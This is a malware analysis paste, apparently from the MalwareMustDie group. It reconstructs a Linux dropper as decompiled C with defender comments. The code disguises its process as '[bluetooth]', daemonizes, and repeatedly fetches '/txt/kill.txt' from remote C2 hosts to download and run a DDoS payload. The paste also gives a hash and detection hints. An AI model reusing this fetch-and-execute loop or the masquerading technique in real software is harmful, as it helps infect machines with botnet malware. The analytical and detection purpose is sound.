
Linux/KillFile

MalwareMustDie Apr 17th, 2014 (edited) 1,054 Never
  1. Linux/KillFile  (made in China)
  2. It downloads and executes Xor DDoS filelessly
  3.  
  4. hash : 82ba1e7c02b91ee4298717f9a8ba20aae3063107c8d818463ceb5829e5746b48 (uploaded to VT)
  5.  
  6. Reverse result:
  7.  
  8. void main(int a1, char arg2)  // entry point (decompiler prototype; arg2 is dereferenced as argv below, so it is really char **argv)
  9. {
  10.   size_t var_length_procname; from EAX
  11.  
  12.   var_length_procname = strlen(*arg2);  // length of argv[0], the name shown by ps
  13.   memset(*arg2, 0, var_length_procname);  // blank the original process name in the argv area
  14.   memcpy(*arg2, "[bluetooth]", 0xCu);  // 12 bytes = "[bluetooth]" + NUL, unconditionally: a shorter argv[0] is overrun into the neighbouring argv/env strings. Bracketed name mimics a kernel thread; defender note: a "[bluetooth]" process with a non-empty /proc/<pid>/exe or a parent other than kthreadd is not a kernel thread
  15.   daemon(1, 0);  // detach from the terminal: keep cwd (nochdir=1), redirect stdio to /dev/null (noclose=0)
  16.   nice(-20);  // ask for the highest scheduling priority (only takes effect as root)
  17.   while ( 1 )  // runs for the life of the process; never breaks out
  18.   {
  19.     if ( kill_time > 4 )  // kill_time is a global defined outside this listing; presumably starts at 0, so this fires every 5th pass
  20.     {
  21.       kill_time = 0;
  22.       killfileandpid();  // fork a child that fetches and runs the C2 payload, then wait for it
  23.       RunFile();  // defined outside this listing
  24.     }
  25.     ++kill_time;
  26.     sleep(1);  // one pass per second, so the fetch/run cycle above repeats roughly every 5 s
  27.   }
  28. }
  29.  
  30. __pid_t killfileandpid()  // fork a detached child that runs KillProcess(); the parent blocks in wait() and returns the reaped pid (-1 if fork failed)
  31. {
  32.   __pid_t result; from EAX
  33.  
  34.   result = fork();
  35.   if ( result >= 0 )  // fork succeeded: 0 in the child, the child's pid in the parent
  36.   {
  37.     if ( !result )  // child branch
  38.     {
  39.       setsid();  // new session, no controlling terminal
  40.       umask(0);  // files the child creates keep their full requested mode bits
  41.       KillProcess();  // does not return; ends in _exit(0)
  42.     }
  43.     result = wait(0);  // parent branch: block until the child (download + exec) has exited
  44.   }
  45.   return result;  // -1 when fork() failed and no child was started
  46. }
  47.  
  48. void __noreturn KillProcess()  // runs in the forked child: fetch /txt/kill.txt from the first reachable remote host and hand its contents to GetProcess(); exits on every path
  49. {
  50.   int v0;  // decompiler mis-typing: the memset below clears 0x2800 bytes through &v0, so this is really a 10240-byte stack buffer for the URL — TODO confirm against the disassembly
  51.   char s[10240];  // download buffer: body of kill.txt
  52.   int i;
  53.  
  54.   memset(s, 0, 0x2800); // buffer for file
  55.   memset(&v0, 0, 0x2800); // buffer for mem
  56.   for ( i = 0; ; ++i )  // try Remote_URL[0..3] in order (Remote_URL is a global table not shown in this listing)
  57.   {
  58.     if ( i > 3 )
  59.       _exit(0);  // all four hosts failed: exit silently; main()'s loop retries in ~5 s
  60.     sprintf(&v0, "%s%s", *(DWORD)&Remote_URL[i], "/txt/kill.txt");  // unbounded sprintf into the stack buffer; the literal path "/txt/kill.txt" is a usable network IoC for proxy/IDS logs
  61.     if ( http_download(&v0, s, 0) ) //  forming HTTP request "GET %s HTTP/1.1\r\n%sHost: %s\r\n%s"; save as file s
  62.       break;  // first successful download wins
  63.   }
  64.   if ( s[strlen(s) - 1] == 10 )  // strip one trailing LF (0x0A); with an empty body this reads s[-1]
  65.     s[strlen(s) - 1] = 0;
  66.   GetProcess(s);  // use proc/exec to execute downloaded file and delete the file after exec
  67.   _exit(0);  // never returns to the caller; the parent's wait() in killfileandpid() collects this exit
  68. }
  69.  
  70. @unixfreaxjp #MalwareMustDie